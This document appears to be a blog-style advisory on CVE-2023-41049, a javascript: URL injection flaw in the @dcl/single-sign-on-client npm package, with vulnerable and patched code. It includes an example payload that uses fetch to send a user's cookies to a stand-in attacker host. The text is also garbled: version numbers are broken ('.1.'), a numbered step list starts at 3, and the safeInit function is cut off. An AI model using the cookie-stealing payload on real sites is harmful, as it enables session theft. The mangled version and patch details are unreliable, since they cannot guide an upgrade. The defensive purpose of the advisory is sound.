CVE-2023-41049 - Critical Remote Code Execution in @dcl/single-sign-on-client npm Library — What It Is and How to Stay Safe

If you’re building web applications with Node.js, you may be familiar with npm libraries that simplify authentication, like @dcl/single-sign-on-client. But if you're still on a version prior to .1., you need to be aware of a serious security vulnerability: CVE-2023-41049.

In this article, we'll dive into what this vulnerability is, how it works, show a code example of the problem, and explain how you can keep your applications safe.

What is CVE-2023-41049?

CVE-2023-41049 is a high-severity security flaw found in the popular npm package @dcl/single-sign-on-client. This library helps developers add Single Sign On (SSO) authentication to their applications.

The root cause is improper input validation in the init function. Specifically, this function doesn’t check its arguments stringently. If someone passes a URL beginning with the javascript: prefix, the library could execute arbitrary JavaScript code. This opens the door to Remote Code Execution (RCE) attacks, which could let a hacker take control of your application.

Where’s the Flaw?

The flaw is in the way the init function handles its first argument. The user is allowed to provide a URL, but the code does not prevent URLs starting with "javascript:". When such a URL is loaded, the browser executes the JavaScript code right away.

Here’s a simplified example that highlights the issue

// Example vulnerable use of @dcl/single-sign-on-client

const { init } = require('@dcl/single-sign-on-client');

// This should be a normal authentication endpoint, like 'https://login.example.com';
const ssoUrl = "javascript:alert('Hacked!')";

// This will cause the browser to execute the code in ssoUrl when the SSO process starts
init(ssoUrl);

If a malicious user is able to inject javascript: URLs into this input, they can run *any* code they'd like on the end user's machine — for example, stealing session tokens or credentials.

`javascript

javascript:fetch('https://evil.attacker.com/steal?cookie=' + document.cookie)

`

3. Trigger the attack — When the site later calls init() with this payload, the browser executes the attacker’s code, sending private information off-site.

> Real-World Impact: If your app lets *anyone* supply a custom SSO URL (for white-label setups, multi-tenant environments, or even by accident through user profiles), a malicious user could easily hijack accounts or compromise your users.

Discovery and Patch

The vulnerability is officially documented as GHSA-pc2f-gfw2-v7f6 and was patched in version .1..

Changelog (see diff):

// Patch: Only allow http(s) URLs
if (!/^https?:\/\//.test(ssoUrl)) {
    throw new Error('Invalid SSO URL');
}

`

npm install @dcl/single-sign-on-client@^.1.

function safeInit(url) {

if (!/^https?:\/\//i.test(url)) {
throw new Error('SSO URL must begin with http:// or https://');

References & Further Reading

- Original Advisory on GitHub
- NPM Library
- Vulnerability Database
- Changelog / Patch

Conclusion

CVE-2023-41049 in @dcl/single-sign-on-client is a critical flaw that could let attackers execute harmful JavaScript through faulty input validation on SSO URLs. If you’re using this library, update to .1. or later now. If you’re unable to upgrade, tightly validate and sanitize all input given to init().

Timeline

Published on: 09/01/2023 20:15:07 UTC
Last modified on: 09/06/2023 00:02:42 UTC